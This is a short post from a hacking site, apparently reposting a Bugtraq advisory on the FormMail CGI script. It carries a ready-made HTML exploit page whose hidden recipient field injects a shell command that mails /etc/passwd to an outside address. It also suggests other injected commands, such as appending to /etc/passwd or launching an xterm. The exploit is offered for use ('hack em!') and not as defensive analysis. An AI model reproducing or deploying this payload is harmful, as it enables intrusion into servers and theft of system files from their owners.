www.TheCyberUnderground.com

Vulnerability in formmail.pl (usually in /cgi-bin/formmail.pl)
Advisory from Bugtraq

-----------------------------

From the FormMail web site, "FormMail is a generic WWW form to e-mail gateway, which will 
parse the results of any form and send them to the specified user." A web server can use a 
remote site's FormMail script without authorization, using remote system resources or 
exploiting other vulnerabilities in the script. (e.g., BugTraq ID 2079) 

If you're not familliar with how the HTML post method works, heres a simple html page
that you can use to exploit this bug.  This page will email you a copy of /etc/passwd,
but only if the computer is running sendmail or some other MTA.  Otherwise, change the
'code' below to execute some other command (xterm -ut, echo 'blah' >> /etc/passwd, or
whatever).

<!----cut here------->

<html><head><title>I'm a 31337 hax0r</title></head>
<body bgcolor="black"><font face="arial, helvetica" color="gray"><center>
formmail.pl xpl0it<p>
<form method="post" action="http://remote.target.host/cgi-bin/formmail.pl">
<input type="hidden" name="recipient" value="me@mymail.host; cat 
/etc/passwd | mail me@mymail.host"><input type="submit" name="submit" value="submit">
</form>hack em!</center></font></body></html>

<!----end------------>